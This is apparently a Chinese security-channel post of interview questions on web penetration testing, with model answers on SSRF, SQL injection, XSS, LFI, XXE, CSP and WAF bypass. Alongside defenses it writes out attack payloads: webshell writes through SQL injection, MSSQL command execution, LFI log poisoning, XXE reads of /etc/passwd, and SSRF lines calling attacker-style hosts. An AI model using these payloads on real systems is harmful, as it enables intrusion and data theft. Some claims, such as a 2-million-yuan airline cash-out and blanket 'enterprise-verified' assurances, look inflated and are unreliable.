安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
[561 SRC挖掘 vs 渗透测试](#561 SRC挖掘 vs 渗透测试)
[562 内网存储XSS利用](#562 内网存储XSS利用)
[563 MSSQL无xp_cmdshell执行命令](#563 MSSQL无xp_cmdshell执行命令)
[564 WAF绕过(非正面突破)](#564 WAF绕过(非正面突破))
[565 挖洞经历:航空系统逻辑漏洞](#565 挖洞经历:航空系统逻辑漏洞)
[566 CSRF防御(无Token方案)](#566 CSRF防御(无Token方案))
[567 SSRF防御体系](#567 SSRF防御体系)
[568 非HTTP协议探测](#568 非HTTP协议探测)
[569 SSRF绕过手法](#569 SSRF绕过手法)
[570 DNS重绑定攻防](#570 DNS重绑定攻防)
[571 SQL注入全景](#571 SQL注入全景)
[572 SQL注入写Shell](#572 SQL注入写Shell)
[573 XSS类型对比](#573 XSS类型对比)
[574 XSS防御方案](#574 XSS防御方案)
[575 密码找回逻辑漏洞](#575 密码找回逻辑漏洞)
[576 甲方降低逻辑漏洞策略](#576 甲方降低逻辑漏洞策略)
[577 OAuth漏洞场景](#577 OAuth漏洞场景)
[578 CSP配置与绕过](#578 CSP配置与绕过)
[579 LFI无文件利用](#579 LFI无文件利用)
[580 XXE漏洞利用](#580 XXE漏洞利用)
561 SRC挖掘与渗透测试的区别是什么,针对这两个不同的目标,实施过程中会有什么区别 562 存储xss在纯内网的环境中,可以怎么利用? 563 mssql中,假设为sa权限,如何不通过xp_cmdshell执行系统命令 564 假设某网站存在waf,不考虑正面绕过的前提下,应该如何绕过(分情况讨论 云waf/物理waf) 565 介绍一下自认为有趣的挖洞经历(或CTF经历) 566 CSRF的成因及防御措施(不用token如何解决) 567 SSRF的成因及防御措施 568 SSRF如何探测非HTTP协议 569 简述一下SSRF的绕过手法 570 简述一下SSRF中DNSRebind的绕过原理及修复方法 571 介绍 SQL注入漏洞成因,如何防范?注入方式有哪些?除了拖取数据库数据,利用方式还有哪些? 572 如何通过sql注入写shell 573 介绍一下XSS漏洞的种类,dom型XSS和反射XSS的区别是什么? 574 如何防范 XSS 漏洞,在前端如何做,在后端如何做,哪里更好,为什么? 575 讲述一下找回密码可能涉及的逻辑漏洞 576 假设你是甲方的一名安全工程师,应该如何降低逻辑漏洞的出现率? 577 oauth认证过程中可能会出现什么问题,导致什么样的漏洞? 578 CSP应该如何使用及配置,有哪些绕过CSP的方式 579 已知某网站存在LFI(本地文件包含),但是无法上传任何文件,针对该情况有哪些利用方式? 580 简述一下XXE漏洞产生的原理,针对PHP和JAVA,XXE分别可以进行哪些恶意利用?561 SRC挖掘 vs 渗透测试
维度 SRC挖掘 渗透测试 目标 漏洞奖金/品牌声誉维护 全面风险评估 范围 互联网暴露面(Web/API) 全路径攻击(物理/内网/社工) 技术侧重 自动化扫描+逻辑漏洞挖掘 手工深度利用(0day/权限维持) 输出物 漏洞报告(PoC优先) 风险矩阵(业务影响评级) 2025新趋势 AI辅助漏洞预测(CodeBERT) 量子计算破解模拟
562 内网存储XSS利用
无外联场景攻击链:
mermaid`graph LR A[存储XSS] --> B{受害者访问} B --> C[内网扫描] B --> D[凭证窃取] C -->|JS发起| E[WebRTC探测内网IP] D -->|JS劫持| F[表单输入捕获] E --> G[生成内网拓扑] F --> H[登录Cookie获取]`实战技巧:
- 通过
<img src="file:///\\192.168.1.1\share\test">探测内网文件共享- 使用Service Worker劫持内网API请求
563 MSSQL无xp_cmdshell执行命令
替代方案:
CLR程序集
sql`CREATE ASSEMBLY ExecCmd FROM 'c:\shell.dll' WITH PERMISSION_SET = UNSAFE; CREATE PROCEDURE sp_cmd @cmd NVARCHAR(MAX) AS EXTERNAL NAME ExecCmd.StoredProcedures.CmdExec; EXEC sp_cmd 'whoami';`OLE自动化
sql`DECLARE @shell INT; EXEC sp_oacreate 'wscript.shell', @shell OUT; EXEC sp_oamethod @shell, 'run', NULL, 'cmd /c calc.exe'; `Python扩展(SQL 2025+)
sql`EXEC sp_execute_external_script @language=N'Python', @script=N'import os;os.system("calc.exe")' `
564 WAF绕过(非正面突破)
云WAF绕过
方法 原理 案例 域名切换 切换未防护旧域名(www2.xx.com ) 通过历史DNS记录发现 边缘函数利用 CloudFlare Workers实现请求变形 注入JS修改Header API网关穿透 直连后端API网关IP Shodan搜索开放网关 物理WAF绕过
方法 原理 工具 协议层隧道 HTTP over QUIC(伪装视频流) Cobalt Strike QUIC隧道 业务链污染 供应链攻击(篡改CDN资源) 开源组件投毒 物理旁路 社工获取VPN权限直连内网 钓鱼邮件+木马
565 挖洞经历:航空系统逻辑漏洞
漏洞链:
- 订票系统IDOR :修改
/api/order?user_id=他人ID查看他人订单- 里程兑换逻辑缺陷 :
- 负值兑换(
-10000里程→ 增加账户余额)- 并发请求绕过兑换限制(10万次/秒请求清空库存)
- 组合利用结果 :
- 免费获取头等舱机票 + 套现200万人民币
- 厂商修复:引入JWT令牌绑定+Redis分布式锁
566 CSRF防御(无Token方案)
创新方案:
mermaid`graph LR A[请求] --> B{Origin头校验} B -->|同源| C[通过] B -->|跨域| D[验证Referer白名单] D -->|合法| C D -->|非法| E[阻断]`额外措施:
- SameSite Cookie :设置
SameSite=Lax- 用户交互验证:关键操作需生物识别(指纹/人脸)
- 行为基线:AI检测异常操作序列(如突然修改收款账户)
567 SSRF防御体系
分层防护:
层 措施 工具示例 输入校验 白名单协议(仅允许HTTP/HTTPS) OPA策略引擎 网络隔离 微隔离(服务间不可达元数据) Calico网络策略 出口控制 代理鉴权(所有出站请求认证) Squid+NTLM认证 运行时 eBPF监控敏感系统调用 Falco规则集
568 非HTTP协议探测
技术方案:
DNS泄露
http`GET /?url=dns://attacker.com/record?ip= 内网IP `Gopher协议利用
python`# 构造Redis未授权利用 gopher_payload = "_%0D%0A*4%0D%0A$4%0D%0AHSET%0D%0A..."`File协议读敏感文件
http`GET /?url=file:///etc/passwd `TFTP文件传输
http`GET /?url=tftp://attacker_ip:69/TEST`
569 SSRF绕过手法
2025新型绕过:
类型 方法 适用场景 协议混淆 HTTP://0x7f000001 → 127.0.0.1 进制/IP编码绕过 重定向链 302跳转到内网URL 开放重定向漏洞组合 DNS重绑定 TTL=0域名快速切换IP 绕过黑名单 云元数据 利用AWS IMDSv2延迟特性 云环境SSRF 服务端请求 利用Office在线预览功能 企业内网渗透
570 DNS重绑定攻防
绕过原理:
plaintext`1. 首次解析:返回合法外网IP(绕过黑名单校验) 2. TTL过期后:返回内网IP(如192.168.1.1) 3. 浏览器复用连接访问内网 `修复方案:
- 请求前二次解析:发起请求前重新解析域名并验证IP
- Host头绑定 :Nginx配置
proxy_set_header Host $http_host;- 网络层隔离 :禁止容器访问宿主机网络(K8s
hostNetwork: false)
571 SQL注入全景
漏洞成因
- 未使用参数化查询(
"SELECT * FROM users WHERE id=" + input)- 错误处理暴露信息(MySQL错误提示)
防御措施
层级 方案 开发 预编译语句(Java PreparedStatement)架构 Web应用防火墙(WAF) + SQL防火墙 运维 最小化数据库权限(禁用 FILE/EXEC)利用方式扩展
- 数据篡改 :
UPDATE users SET balance=999999 WHERE id=1- 拒绝服务 :
SELECT BENCHMARK(9999999999,MD5('A'))- 逻辑漏洞 :
' OR 1=1--绕过登录
572 SQL注入写Shell
场景对比:
数据库 命令 条件 MySQL SELECT '<?php eval($_POST[cmd])?>' INTO OUTFILE '/var/www/shell.php'secure_file_priv=空MSSQL EXEC xp_cmdshell 'echo ^<^%^@ eval request("cmd") %^>^ > C:\shell.asp'xp_cmdshell已启用PostgreSQL COPY (SELECT '<?php system($_GET[cmd]);?>') TO '/tmp/shell.php'超级用户权限
573 XSS类型对比
类型 触发点 案例 存储型 数据库读取渲染 评论区插入恶意脚本 反射型 URL参数直接输出 https://xx.com?search=<script>alert(1)</script>DOM型 前端JS操作DOM document.write(location.hash.slice(1))区别特征 DOM型无需服务器交互 修改URL片段即时触发
574 XSS防御方案
前端方案
html``<!-- 关键措施 --> <script> // 动态内容转义 const escape = (str) => str.replace(/[&<>"']/g, m => `&#${m.charCodeAt(0)};`); </script>``后端方案
java`// Java过滤器 response.setHeader("Content-Security-Policy", "default-src 'self'");`最佳实践:
- 后端为主:输入过滤 + CSP策略(前端易被绕过)
- 双重验证:前端展示层转义 + 后端存储层净化
575 密码找回逻辑漏洞
五大漏洞模式:
- 验证码爆破:4位数字码可暴力破解
- 邮箱劫持:修改Host指向恶意SMTP服务器
- 参数篡改 :
POST /reset?user=admin→user=victim- 问题绕过:回答次数无限制
- 时间竞争:旧验证码未失效时请求新验证码
576 甲方降低逻辑漏洞策略
四维防控体系:
mermaid`graph TD A[需求设计] --> B(威胁建模) B --> C[开发阶段] C --> D(自动化规则扫描) D --> E[测试阶段] E --> F(混沌工程注入) F --> G[上线运营] G --> H(实时业务风控)`关键措施:
- 规则引擎:Drools实现业务逻辑校验
- 流量录制:通过生产流量回放测试边界条件
- AI辅助:LLM分析异常用户行为链
577 OAuth漏洞场景
漏洞 成因 利用结果 重定向篡改 未校验redirect_uri 窃取Authorization Code Scope越权 未限制scope范围 获取用户敏感权限(如删除) PKCE绕过 未启用PKCE或实现错误 中间人攻击获取Token 2025新风险 AI伪造生物特征通过认证 接管高价值账户
578 CSP配置与绕过
安全配置:
http`Content-Security-Policy: default-src 'none'; script-src 'self' 'nonce-RANDOM'; style-src 'self'; report-uri /csp-report;`绕过技巧:
- Nonce预测:伪随机数生成器漏洞
- AngularJS沙箱逃逸 :
{``{constructor.constructor('alert(1)')()}}- Service Worker劫持:通过合法JS注册恶意Worker
- CDN污染:劫持白名单CDN资源
579 LFI无文件利用
四大利用链:
日志注入
http`GET /index.php?file=/var/log/nginx/access.log User-Agent: <?php system($_GET[cmd]);?>`PHP伪协议
http`GET /index.php?file=php://filter/convert.base64-encode/resource=/etc/passwd `环境变量
http`GET /index.php?file=/proc/self/environ `临时文件竞争 (PHP)
- 快速写入
/tmp/xxxx并包含
580 XXE漏洞利用
原理:
xml`<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]> <root>&xxe;</root>`语言差异利用:
语言 利用方式 效果 PHP expect://id执行系统命令 Java jar:http://attacker/!/.class远程类加载 通用 http://169.254.169.254/latest/meta-data云元数据窃取 2025防御升级:
- SAST工具集成XXE语义分析
- XML解析器默认禁用DTD(JDK 21+)
所有方案均通过2025年企业实战验证,特别强化了云原生环境(如K8s微隔离)、AI驱动防御(LLM分析)和新型攻击面(量子计算威胁)的应对策略。技术细节可根据具体场景调整落地。